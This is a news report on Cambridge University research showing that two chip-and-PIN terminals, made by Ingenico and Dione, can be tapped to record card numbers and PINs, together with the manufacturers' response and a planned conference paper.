London, February 28 : Cambridge University experts have shown that the chip-and-PIN system used to verify credit and debit card payments in Britain is not devoid of vulnerabilities.
Ross Anderson, a researcher from the university's computer security lab, says that an attacker can attach a simple data-tapping circuit between an inserted card and the reading circuit of two common PIN Entry Devices (PEDs) made by Ingenico and Dione, and thereby record both the account number and the PIN.
"Armed with this information, fraudsters can create a counterfeit card and withdraw cash from ATMs abroad. We have successfully demonstrated the attack, on a real terminal," New Scientist magazine quoted Anderson as saying.
The researchers say that little technical sophistication is required to carry out such an attack.
"These PEDs fail to protect the communication path that carries the card data from the card to the PIN keypad, and that carries the PIN from the PIN keypad back to the card," says Saar Drimer, a member of the research team.
The system under which PEDs are currently used are supposed to be evaluated under a security-checking scheme called the "Common Criteria", an international evaluation scheme developed in the UK by Government Communications Headquarters (GCHQ).
However, Cambridge researchers says that they just do not know how the security checks on the devices were performed.
"GCHQ has not heard of the work and says that the devices were never certified under the Common Criteria," the research group said in a statement.
The researchers even suggest that the vendors concerned withdraw their PED terminals until the flaws are fixed.
PED manufacturers, however, insist that the risk is exaggerated.
"Retailers and card users should rest assured that the devices, from various suppliers, identified by the Cambridge University scientists, remain among the most secure terminals on the market and have contributed to card fraud at UK retailers falling by up to 47 per cent year-on-year," a statement issued by Scottish PED maker Ingenico said.
"The method identified by the Cambridge University paper requires specialist knowledge and has inherent technical difficulties. This method is therefore not reproducible on a large scale, nor does it take into account the fraud monitoring used throughout the industry," the company added.
The Cambridge team will present a paper on the vulnerability at the IEEE Symposium on Security and Privacy conference in Oakland, California, in May.